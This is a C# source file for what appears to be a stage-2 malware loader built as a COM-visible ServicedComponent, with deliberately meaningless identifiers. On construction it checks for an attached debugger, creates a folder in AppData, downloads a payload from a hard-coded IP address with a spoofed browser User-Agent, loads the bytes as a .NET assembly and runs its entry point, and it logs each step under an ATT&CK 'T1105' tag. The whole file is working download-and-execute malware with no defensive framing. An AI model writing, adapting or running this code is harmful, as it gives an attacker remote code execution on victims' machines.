using System;
using System.EnterpriseServices;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;

[ComVisible(true)]
[Guid("7A8B93C4-E2D1-4F9A-8C3B-5D6E7F8A9B0C")]
public class Umlmqbp : ServicedComponent
{
    const string vxzjlk = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const string twrsqp = "http://100.111.22.117:8000";
    const string yhnjkm = "1006";
    const string fghrty = "10";
    const string bvcxza = "https://http://100.111.22.117:8000/stage/1006/3?endpoint_id=10";
    
    public Umlmqbp()
    {
        qwerty();
    }
    
    private void qwerty()
    {
        try
        {
            if (zxcvbn())
            {
                byte[] nmklpo = lkjhgf();
                if (nmklpo != null && nmklpo.Length > 0)
                {
                    poiuyy(nmklpo);
                }
            }
        }
        catch
        {
            jhgtfr(0);
        }
    }
    
    private bool zxcvbn()
    {
        try
        {
            if (System.Diagnostics.Debugger.IsAttached)
                return false;
                
            string mnpqwe = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string lkjmnb = Path.Combine(mnpqwe, yhnjkm);
            
            if (!Directory.Exists(lkjmnb))
                Directory.CreateDirectory(lkjmnb);
                
            return true;
        }
        catch
        {
            return false;
        }
    }
    
    private byte[] lkjhgf()
    {
        try
        {
            using (WebClient xcvbmm = new WebClient())
            {
                xcvbmm.Headers["User-Agent"] = vxzjlk;
                xcvbmm.Proxy = null;
                
                string qazwsx = string.Format(bvcxza, fghrty, yhnjkm);
                byte[] edcrfv = xcvbmm.DownloadData(qazwsx);
                
                jhgtfr(1);
                return edcrfv;
            }
        }
        catch
        {
            jhgtfr(0);
            return null;
        }
    }
    
    private void poiuyy(byte[] tfghyu)
    {
        try
        {
            Assembly rfvtgb = Assembly.Load(tfghyu);
            if (rfvtgb.EntryPoint != null)
            {
                rfvtgb.EntryPoint.Invoke(null, new object[] { new string[0] });
                jhgtfr(1);
            }
            else
            {
                jhgtfr(0);
            }
        }
        catch
        {
            jhgtfr(0);
        }
    }
    
    private void jhgtfr(int mklopq)
    {
        try
        {
            string nbmvxc = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string qwertz = Path.Combine(nbmvxc, yhnjkm);
            string yuiopl = DateTime.Now.ToString("yyyyMMddHHmmss");
            string asdfgh = Path.Combine(qwertz, $"{yuiopl}-Log.txt");
            
            string lkjhgf = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}][Stage 2 Loader-DLL Universal NET]: {fghrty}-{yhnjkm}-T1105={mklopq}";
            File.AppendAllText(asdfgh, lkjhgf + Environment.NewLine);
        }
        catch
        {
        }
    }
    
    [ComUnregisterFunction]
    public static void Wsxqaz(Type x)
    {
    }
}